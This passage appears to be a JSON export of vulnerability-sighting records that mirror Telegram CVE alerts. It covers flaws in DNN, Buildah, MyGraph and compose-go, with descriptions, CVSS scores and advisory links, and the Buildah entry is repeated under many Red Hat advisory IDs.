CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N)\n\ud83d\udd39 Description: DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. A url could be crafted to the DNN ImageHandler to render text from a querystring parameter. This text would display in the resulting image and a user that trusts the domain might think that the information is legitimate. This vulnerability is fixed in 9.13.4.\n\ud83d\udccf Published: 2025-04-09T15:14:29.025Z\n\ud83d\udccf Modified: 2025-04-09T15:41:55.992Z\n\ud83d\udd17 References:\n1. https://github.com/dnnsoftware/Dnn.Platform/security/advisories/GHSA-2rrc-g594-rhqw\n2. https://github.com/dnnsoftware/Dnn.Platform/commit/5def7cc2e7931bb1041b21540bde99f96874a5a9", "creation_timestamp": "2025-04-09T15:47:42.000000Z"}, {"uuid": "2a55a30d-dbe6-497c-b21f-f32801c6b7fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VC6J-MCQJ-RGFP", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11086", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32374\n\ud83d\udd25 CVSS Score: 5.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Possible denial of service with specially crafted information in the public registration form. This vulnerability is fixed in 9.13.8.\n\ud83d\udccf Published: 2025-04-09T15:14:51.957Z\n\ud83d\udccf Modified: 2025-04-09T15:44:49.820Z\n\ud83d\udd17 References:\n1. https://github.com/dnnsoftware/Dnn.Platform/security/advisories/GHSA-vc6j-mcqj-rgfp", "creation_timestamp": "2025-04-09T15:47:31.000000Z"}, {"uuid": "feabb74b-015a-4ff2-ad5f-bb37485aa6f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:3301", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/11358", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9675\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Buildah. Cache mounts do not properly validate that user-specified paths for the cache are within our cache directory, allowing a `RUN` instruction in a Container file to mount an arbitrary directory from the host (read/write) into the container as long as those files can be accessed by the user running Buildah.\n\ud83d\udccf Published: 2024-10-09T14:32:11.922Z\n\ud83d\udccf Modified: 2025-04-10T21:41:41.385Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8563\n2. https://access.redhat.com/errata/RHSA-2024:8675\n3. https://access.redhat.com/errata/RHSA-2024:8679\n4. https://access.redhat.com/errata/RHSA-2024:8686\n5. https://access.redhat.com/errata/RHSA-2024:8690\n6. https://access.redhat.com/errata/RHSA-2024:8700\n7. https://access.redhat.com/errata/RHSA-2024:8703\n8. https://access.redhat.com/errata/RHSA-2024:8707\n9. https://access.redhat.com/errata/RHSA-2024:8708\n10. https://access.redhat.com/errata/RHSA-2024:8709\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:8984\n13. https://access.redhat.com/errata/RHSA-2024:8994\n14. https://access.redhat.com/errata/RHSA-2024:9051\n15. https://access.redhat.com/errata/RHSA-2024:9454\n16. https://access.redhat.com/errata/RHSA-2024:9459\n17. https://access.redhat.com/errata/RHSA-2025:2445\n18. https://access.redhat.com/errata/RHSA-2025:2449\n19. https://access.redhat.com/errata/RHSA-2025:2454\n20. https://access.redhat.com/errata/RHSA-2025:2701\n21. https://access.redhat.com/errata/RHSA-2025:2710\n22. https://access.redhat.com/errata/RHSA-2025:3301\n23. https://access.redhat.com/errata/RHSA-2025:3573\n24. https://access.redhat.com/security/cve/CVE-2024-9675\n25. https://bugzilla.redhat.com/show_bug.cgi?id=2317458", "creation_timestamp": "2025-04-10T21:49:44.000000Z"}, {"uuid": "91eba6e4-c159-4cbd-8cdc-78ab1a841c98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:9454", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/11358", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9675\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Buildah. Cache mounts do not properly validate that user-specified paths for the cache are within our cache directory, allowing a `RUN` instruction in a Container file to mount an arbitrary directory from the host (read/write) into the container as long as those files can be accessed by the user running Buildah.\n\ud83d\udccf Published: 2024-10-09T14:32:11.922Z\n\ud83d\udccf Modified: 2025-04-10T21:41:41.385Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8563\n2. https://access.redhat.com/errata/RHSA-2024:8675\n3. https://access.redhat.com/errata/RHSA-2024:8679\n4. https://access.redhat.com/errata/RHSA-2024:8686\n5. https://access.redhat.com/errata/RHSA-2024:8690\n6. https://access.redhat.com/errata/RHSA-2024:8700\n7. https://access.redhat.com/errata/RHSA-2024:8703\n8. https://access.redhat.com/errata/RHSA-2024:8707\n9. https://access.redhat.com/errata/RHSA-2024:8708\n10. https://access.redhat.com/errata/RHSA-2024:8709\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:8984\n13. https://access.redhat.com/errata/RHSA-2024:8994\n14. https://access.redhat.com/errata/RHSA-2024:9051\n15. https://access.redhat.com/errata/RHSA-2024:9454\n16. https://access.redhat.com/errata/RHSA-2024:9459\n17. https://access.redhat.com/errata/RHSA-2025:2445\n18. https://access.redhat.com/errata/RHSA-2025:2449\n19. https://access.redhat.com/errata/RHSA-2025:2454\n20. https://access.redhat.com/errata/RHSA-2025:2701\n21. https://access.redhat.com/errata/RHSA-2025:2710\n22. https://access.redhat.com/errata/RHSA-2025:3301\n23. https://access.redhat.com/errata/RHSA-2025:3573\n24. https://access.redhat.com/security/cve/CVE-2024-9675\n25. https://bugzilla.redhat.com/show_bug.cgi?id=2317458", "creation_timestamp": "2025-04-10T21:49:44.000000Z"}, {"uuid": "ee1e7355-4d4f-4831-8cfd-e2a5dca3d78a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HJ4J-923H-927J", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13452", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-39240\n\ud83d\udd25 CVSS Score: 5.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)\n\ud83d\udd39 Description: MyGraph is a permission management system. Versions prior to 1.0.4 are vulnerable to a storage XSS vulnerability leading to Remote Code Execution. This issue is patched in version 1.0.4. There is no known workaround.\n\ud83d\udccf Published: 2022-09-24T01:40:08.000Z\n\ud83d\udccf Modified: 2025-04-25T16:04:00.463Z\n\ud83d\udd17 References:\n1. https://github.com/renlm/MyGraph/security/advisories/GHSA-hj4j-923h-927j", "creation_timestamp": "2025-04-25T16:07:08.000000Z"}, {"uuid": "dfda6aba-8074-4640-80f2-688da3757bd9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-36GQ-35J3-P9R9", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13560", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-10846\n\ud83d\udd25 CVSS Score: 5.9 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:N/I:N/A:H)\n\ud83d\udd39 Description: The compose-go library component in versions v2.10-v2.4.0 allows an authorized user who sends malicious YAML payloads to cause the compose-go to consume excessive amount of Memory and CPU cycles while parsing YAML, such as used by Docker Compose from versions  v2.27.0 to v2.29.7 included\n\ud83d\udccf Published: 2025-01-23T15:22:56.170Z\n\ud83d\udccf Modified: 2025-04-25T23:02:53.505Z\n\ud83d\udd17 References:\n1. https://github.com/compose-spec/compose-go/security/advisories/GHSA-36gq-35j3-p9r9", "creation_timestamp": "2025-04-26T00:07:36.000000Z"}, {"uuid": "dd68c63b-f2d1-4a06-bcc5-636e4355b26d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2445", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/11358", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9675\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Buildah. Cache mounts do not properly validate that user-specified paths for the cache are within our cache directory, allowing a `RUN` instruction in a Container file to mount an arbitrary directory from the host (read/write) into the container as long as those files can be accessed by the user running Buildah.\n\ud83d\udccf Published: 2024-10-09T14:32:11.922Z\n\ud83d\udccf Modified: 2025-04-10T21:41:41.385Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8563\n2. https://access.redhat.com/errata/RHSA-2024:8675\n3. https://access.redhat.com/errata/RHSA-2024:8679\n4. https://access.redhat.com/errata/RHSA-2024:8686\n5. https://access.redhat.com/errata/RHSA-2024:8690\n6. https://access.redhat.com/errata/RHSA-2024:8700\n7. https://access.redhat.com/errata/RHSA-2024:8703\n8. https://access.redhat.com/errata/RHSA-2024:8707\n9. https://access.redhat.com/errata/RHSA-2024:8708\n10. https://access.redhat.com/errata/RHSA-2024:8709\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:8984\n13. https://access.redhat.com/errata/RHSA-2024:8994\n14. https://access.redhat.com/errata/RHSA-2024:9051\n15. https://access.redhat.com/errata/RHSA-2024:9454\n16. https://access.redhat.com/errata/RHSA-2024:9459\n17. https://access.redhat.com/errata/RHSA-2025:2445\n18. https://access.redhat.com/errata/RHSA-2025:2449\n19. https://access.redhat.com/errata/RHSA-2025:2454\n20. https://access.redhat.com/errata/RHSA-2025:2701\n21. https://access.redhat.com/errata/RHSA-2025:2710\n22. https://access.redhat.com/errata/RHSA-2025:3301\n23. https://access.redhat.com/errata/RHSA-2025:3573\n24. https://access.redhat.com/security/cve/CVE-2024-9675\n25. https://bugzilla.redhat.com/show_bug.cgi?id=2317458", "creation_timestamp": "2025-04-10T21:49:44.000000Z"}, {"uuid": "80da6ea5-7310-4a80-9b4f-41f5224d9233", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2701", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/11358", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9675\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Buildah. Cache mounts do not properly validate that user-specified paths for the cache are within our cache directory, allowing a `RUN` instruction in a Container file to mount an arbitrary directory from the host (read/write) into the container as long as those files can be accessed by the user running Buildah.\n\ud83d\udccf Published: 2024-10-09T14:32:11.922Z\n\ud83d\udccf Modified: 2025-04-10T21:41:41.385Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8563\n2. https://access.redhat.com/errata/RHSA-2024:8675\n3. https://access.redhat.com/errata/RHSA-2024:8679\n4. https://access.redhat.com/errata/RHSA-2024:8686\n5. https://access.redhat.com/errata/RHSA-2024:8690\n6. https://access.redhat.com/errata/RHSA-2024:8700\n7. https://access.redhat.com/errata/RHSA-2024:8703\n8. https://access.redhat.com/errata/RHSA-2024:8707\n9. https://access.redhat.com/errata/RHSA-2024:8708\n10. https://access.redhat.com/errata/RHSA-2024:8709\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:8984\n13. https://access.redhat.com/errata/RHSA-2024:8994\n14. https://access.redhat.com/errata/RHSA-2024:9051\n15. https://access.redhat.com/errata/RHSA-2024:9454\n16. https://access.redhat.com/errata/RHSA-2024:9459\n17. https://access.redhat.com/errata/RHSA-2025:2445\n18. https://access.redhat.com/errata/RHSA-2025:2449\n19. https://access.redhat.com/errata/RHSA-2025:2454\n20. https://access.redhat.com/errata/RHSA-2025:2701\n21. https://access.redhat.com/errata/RHSA-2025:2710\n22. https://access.redhat.com/errata/RHSA-2025:3301\n23. https://access.redhat.com/errata/RHSA-2025:3573\n24. https://access.redhat.com/security/cve/CVE-2024-9675\n25. https://bugzilla.redhat.com/show_bug.cgi?id=2317458", "creation_timestamp": "2025-04-10T21:49:44.000000Z"}, {"uuid": "3178ba49-53cc-4295-b6ac-6bf3a30e1bc8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8984", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/11358", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9675\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Buildah. Cache mounts do not properly validate that user-specified paths for the cache are within our cache directory, allowing a `RUN` instruction in a Container file to mount an arbitrary directory from the host (read/write) into the container as long as those files can be accessed by the user running Buildah.\n\ud83d\udccf Published: 2024-10-09T14:32:11.922Z\n\ud83d\udccf Modified: 2025-04-10T21:41:41.385Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8563\n2. https://access.redhat.com/errata/RHSA-2024:8675\n3. https://access.redhat.com/errata/RHSA-2024:8679\n4. https://access.redhat.com/errata/RHSA-2024:8686\n5. https://access.redhat.com/errata/RHSA-2024:8690\n6. https://access.redhat.com/errata/RHSA-2024:8700\n7. https://access.redhat.com/errata/RHSA-2024:8703\n8. https://access.redhat.com/errata/RHSA-2024:8707\n9. https://access.redhat.com/errata/RHSA-2024:8708\n10. https://access.redhat.com/errata/RHSA-2024:8709\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:8984\n13. https://access.redhat.com/errata/RHSA-2024:8994\n14. https://access.redhat.com/errata/RHSA-2024:9051\n15. https://access.redhat.com/errata/RHSA-2024:9454\n16. https://access.redhat.com/errata/RHSA-2024:9459\n17. https://access.redhat.com/errata/RHSA-2025:2445\n18. https://access.redhat.com/errata/RHSA-2025:2449\n19. https://access.redhat.com/errata/RHSA-2025:2454\n20. https://access.redhat.com/errata/RHSA-2025:2701\n21. https://access.redhat.com/errata/RHSA-2025:2710\n22. https://access.redhat.com/errata/RHSA-2025:3301\n23. https://access.redhat.com/errata/RHSA-2025:3573\n24. https://access.redhat.com/security/cve/CVE-2024-9675\n25. https://bugzilla.redhat.com/show_bug.cgi?id=2317458", "creation_timestamp": "2025-04-10T21:49:44.000000Z"}, {"uuid": "3b5d6a15-13f2-4c01-b56a-534e5681b74b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2710", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/11358", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9675\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Buildah. Cache mounts do not properly validate that user-specified paths for the cache are within our cache directory, allowing a `RUN` instruction in a Container file to mount an arbitrary directory from the host (read/write) into the container as long as those files can be accessed by the user running Buildah.\n\ud83d\udccf Published: 2024-10-09T14:32:11.922Z\n\ud83d\udccf Modified: 2025-04-10T21:41:41.385Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8563\n2. https://access.redhat.com/errata/RHSA-2024:8675\n3. https://access.redhat.com/errata/RHSA-2024:8679\n4. https://access.redhat.com/errata/RHSA-2024:8686\n5. https://access.redhat.com/errata/RHSA-2024:8690\n6. https://access.redhat.com/errata/RHSA-2024:8700\n7. https://access.redhat.com/errata/RHSA-2024:8703\n8. https://access.redhat.com/errata/RHSA-2024:8707\n9. https://access.redhat.com/errata/RHSA-2024:8708\n10. https://access.redhat.com/errata/RHSA-2024:8709\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:8984\n13. https://access.redhat.com/errata/RHSA-2024:8994\n14. https://access.redhat.com/errata/RHSA-2024:9051\n15. https://access.redhat.com/errata/RHSA-2024:9454\n16. https://access.redhat.com/errata/RHSA-2024:9459\n17. https://access.redhat.com/errata/RHSA-2025:2445\n18. https://access.redhat.com/errata/RHSA-2025:2449\n19. https://access.redhat.com/errata/RHSA-2025:2454\n20. https://access.redhat.com/errata/RHSA-2025:2701\n21. https://access.redhat.com/errata/RHSA-2025:2710\n22. https://access.redhat.com/errata/RHSA-2025:3301\n23. https://access.redhat.com/errata/RHSA-2025:3573\n24. https://access.redhat.com/security/cve/CVE-2024-9675\n25. https://bugzilla.redhat.com/show_bug.cgi?id=2317458", "creation_timestamp": "2025-04-10T21:49:44.000000Z"}, {"uuid": "857a63a1-c84d-486b-9d08-3fbff7e67182", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8707", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/11358", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9675\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Buildah. Cache mounts do not properly validate that user-specified paths for the cache are within our cache directory, allowing a `RUN` instruction in a Container file to mount an arbitrary directory from the host (read/write) into the container as long as those files can be accessed by the user running Buildah.\n\ud83d\udccf Published: 2024-10-09T14:32:11.922Z\n\ud83d\udccf Modified: 2025-04-10T21:41:41.385Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8563\n2. https://access.redhat.com/errata/RHSA-2024:8675\n3. https://access.redhat.com/errata/RHSA-2024:8679\n4. https://access.redhat.com/errata/RHSA-2024:8686\n5. https://access.redhat.com/errata/RHSA-2024:8690\n6. https://access.redhat.com/errata/RHSA-2024:8700\n7. https://access.redhat.com/errata/RHSA-2024:8703\n8. https://access.redhat.com/errata/RHSA-2024:8707\n9. https://access.redhat.com/errata/RHSA-2024:8708\n10. https://access.redhat.com/errata/RHSA-2024:8709\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:8984\n13. https://access.redhat.com/errata/RHSA-2024:8994\n14. https://access.redhat.com/errata/RHSA-2024:9051\n15. https://access.redhat.com/errata/RHSA-2024:9454\n16. https://access.redhat.com/errata/RHSA-2024:9459\n17. https://access.redhat.com/errata/RHSA-2025:2445\n18. https://access.redhat.com/errata/RHSA-2025:2449\n19. https://access.redhat.com/errata/RHSA-2025:2454\n20. https://access.redhat.com/errata/RHSA-2025:2701\n21. https://access.redhat.com/errata/RHSA-2025:2710\n22. https://access.redhat.com/errata/RHSA-2025:3301\n23. https://access.redhat.com/errata/RHSA-2025:3573\n24. https://access.redhat.com/security/cve/CVE-2024-9675\n25. https://bugzilla.redhat.com/show_bug.cgi?id=2317458", "creation_timestamp": "2025-04-10T21:49:44.000000Z"}, {"uuid": "ad0fc1f9-8db5-4abc-a05b-3e091bc1c82b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8679", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/11358", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9675\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Buildah. Cache mounts do not properly validate that user-specified paths for the cache are within our cache directory, allowing a `RUN` instruction in a Container file to mount an arbitrary directory from the host (read/write) into the container as long as those files can be accessed by the user running Buildah.\n\ud83d\udccf Published: 2024-10-09T14:32:11.922Z\n\ud83d\udccf Modified: 2025-04-10T21:41:41.385Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8563\n2. https://access.redhat.com/errata/RHSA-2024:8675\n3. https://access.redhat.com/errata/RHSA-2024:8679\n4. https://access.redhat.com/errata/RHSA-2024:8686\n5. https://access.redhat.com/errata/RHSA-2024:8690\n6. https://access.redhat.com/errata/RHSA-2024:8700\n7. https://access.redhat.com/errata/RHSA-2024:8703\n8. https://access.redhat.com/errata/RHSA-2024:8707\n9. https://access.redhat.com/errata/RHSA-2024:8708\n10. https://access.redhat.com/errata/RHSA-2024:8709\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:8984\n13. https://access.redhat.com/errata/RHSA-2024:8994\n14. https://access.redhat.com/errata/RHSA-2024:9051\n15. https://access.redhat.com/errata/RHSA-2024:9454\n16. https://access.redhat.com/errata/RHSA-2024:9459\n17. https://access.redhat.com/errata/RHSA-2025:2445\n18. https://access.redhat.com/errata/RHSA-2025:2449\n19. https://access.redhat.com/errata/RHSA-2025:2454\n20. https://access.redhat.com/errata/RHSA-2025:2701\n21. https://access.redhat.com/errata/RHSA-2025:2710\n22. https://access.redhat.com/errata/RHSA-2025:3301\n23. https://access.redhat.com/errata/RHSA-2025:3573\n24. https://access.redhat.com/security/cve/CVE-2024-9675\n25. https://bugzilla.redhat.com/show_bug.cgi?id=2317458", "creation_timestamp": "2025-04-10T21:49:44.000000Z"}, {"uuid": "eb95c214-33a9-4537-a30f-5ab4edda2700", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8690", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/11358", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9675\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Buildah. Cache mounts do not properly validate that user-specified paths for the cache are within our cache directory, allowing a `RUN` instruction in a Container file to mount an arbitrary directory from the host (read/write) into the container as long as those files can be accessed by the user running Buildah.\n\ud83d\udccf Published: 2024-10-09T14:32:11.922Z\n\ud83d\udccf Modified: 2025-04-10T21:41:41.385Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8563\n2. https://access.redhat.com/errata/RHSA-2024:8675\n3. https://access.redhat.com/errata/RHSA-2024:8679\n4. https://access.redhat.com/errata/RHSA-2024:8686\n5. https://access.redhat.com/errata/RHSA-2024:8690\n6. https://access.redhat.com/errata/RHSA-2024:8700\n7. https://access.redhat.com/errata/RHSA-2024:8703\n8. https://access.redhat.com/errata/RHSA-2024:8707\n9. https://access.redhat.com/errata/RHSA-2024:8708\n10. https://access.redhat.com/errata/RHSA-2024:8709\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:8984\n13. https://access.redhat.com/errata/RHSA-2024:8994\n14. https://access.redhat.com/errata/RHSA-2024:9051\n15. https://access.redhat.com/errata/RHSA-2024:9454\n16. https://access.redhat.com/errata/RHSA-2024:9459\n17. https://access.redhat.com/errata/RHSA-2025:2445\n18. https://access.redhat.com/errata/RHSA-2025:2449\n19. https://access.redhat.com/errata/RHSA-2025:2454\n20. https://access.redhat.com/errata/RHSA-2025:2701\n21. https://access.redhat.com/errata/RHSA-2025:2710\n22. https://access.redhat.com/errata/RHSA-2025:3301\n23. https://access.redhat.com/errata/RHSA-2025:3573\n24. https://access.redhat.com/security/cve/CVE-2024-9675\n25. https://bugzilla.redhat.com/show_bug.cgi?id=2317458", "creation_timestamp": "2025-04-10T21:49:44.000000Z"}, {"uuid": "f9b82d87-51aa-4fa7-a270-ec30fa3dd4dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:9051", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/11358", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9675\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Buildah. Cache mounts do not properly validate that user-specified paths for the cache are within our cache directory, allowing a `RUN` instruction in a Container file to mount an arbitrary directory from the host (read/write) into the container as long as those files can be accessed by the user running Buildah.\n\ud83d\udccf Published: 2024-10-09T14:32:11.922Z\n\ud83d\udccf Modified: 2025-04-10T21:41:41.385Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8563\n2. https://access.redhat.com/errata/RHSA-2024:8675\n3. https://access.redhat.com/errata/RHSA-2024:8679\n4. https://access.redhat.com/errata/RHSA-2024:8686\n5. https://access.redhat.com/errata/RHSA-2024:8690\n6. https://access.redhat.com/errata/RHSA-2024:8700\n7. https://access.redhat.com/errata/RHSA-2024:8703\n8. https://access.redhat.com/errata/RHSA-2024:8707\n9. https://access.redhat.com/errata/RHSA-2024:8708\n10. https://access.redhat.com/errata/RHSA-2024:8709\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:8984\n13. https://access.redhat.com/errata/RHSA-2024:8994\n14. https://access.redhat.com/errata/RHSA-2024:9051\n15. https://access.redhat.com/errata/RHSA-2024:9454\n16. https://access.redhat.com/errata/RHSA-2024:9459\n17. https://access.redhat.com/errata/RHSA-2025:2445\n18. https://access.redhat.com/errata/RHSA-2025:2449\n19. https://access.redhat.com/errata/RHSA-2025:2454\n20. https://access.redhat.com/errata/RHSA-2025:2701\n21. https://access.redhat.com/errata/RHSA-2025:2710\n22. https://access.redhat.com/errata/RHSA-2025:3301\n23. https://access.redhat.com/errata/RHSA-2025:3573\n24. https://access.redhat.com/security/cve/CVE-2024-9675\n25. https://bugzilla.redhat.com/show_bug.cgi?id=2317458", "creation_timestamp": "2025-04-10T21:49:44.000000Z"}, {"uuid": "ccf97c15-d052-494c-b22e-b8ea6981614a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2454", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/11358", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9675\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Buildah. Cache mounts do not properly validate that user-specified paths for the cache are within our cache directory, allowing a `RUN` instruction in a Container file to mount an arbitrary directory from the host (read/write) into the container as long as those files can be accessed by the user running Buildah.\n\ud83d\udccf Published: 2024-10-09T14:32:11.922Z\n\ud83d\udccf Modified: 2025-04-10T21:41:41.385Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8563\n2. https://access.redhat.com/errata/RHSA-2024:8675\n3. https://access.redhat.com/errata/RHSA-2024:8679\n4. https://access.redhat.com/errata/RHSA-2024:8686\n5. https://access.redhat.com/errata/RHSA-2024:8690\n6. https://access.redhat.com/errata/RHSA-2024:8700\n7. https://access.redhat.com/errata/RHSA-2024:8703\n8. https://access.redhat.com/errata/RHSA-2024:8707\n9. 